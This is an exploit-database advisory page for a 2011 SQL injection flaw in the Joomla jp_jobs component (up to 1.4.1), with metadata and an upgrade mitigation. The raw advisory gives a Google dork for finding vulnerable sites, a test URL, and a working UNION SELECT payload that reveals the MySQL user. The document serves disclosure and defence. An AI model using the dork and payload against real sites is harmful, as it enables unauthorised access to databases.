header-logo
Suggest Exploit
vendor:
jp_jobs
by:
Valentin Hoebel
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: jp_jobs
Affected Version From: All
Affected Version To: 1.4.1
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla_projects:jp_jobs
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Joomla component jp_jobs SQL Injection vulnerability

The component is extremly useful when it comes down to implementing some sort of job portal into your Joomla website. Injecting SQL commands while viewing details about a job is possible.

Mitigation:

Upgrade to the latest version of jp_jobs
Source

Exploit-DB raw data:

:: General information
:: Joomla component jp_jobs SQL Injection vulnerability
:: by Valentin Hoebel
:: valentin@xenuser.org

:: Product information
:: Name = jp_jobs
:: Vendor = Joomla! Projects
:: Vendor Website = http://www.joomlanetprojects.com/
:: About the product = http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11163
:: Affected versions = All, latest one is 1.4.1
:: Google dork: "inurl:index.php?option=com_jp_jobs"


:: SQL Injection vulnerability
The component is extremly useful when it comes down to implementing some sort of job portal into your Joomla website.
Injecting SQL commands while viewing details about a job is possible.

Vulnerable URL
http://some-cool-domain.tld/index.php?option=com_jp_jobs&view=detail&id=1

Test URL
http://some-cool-domain.tld/index.php?option=com_jp_jobs&view=detail&id='

Exploit vulnerability, e.g. by displaying the MySQL user:
index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+concat(user())--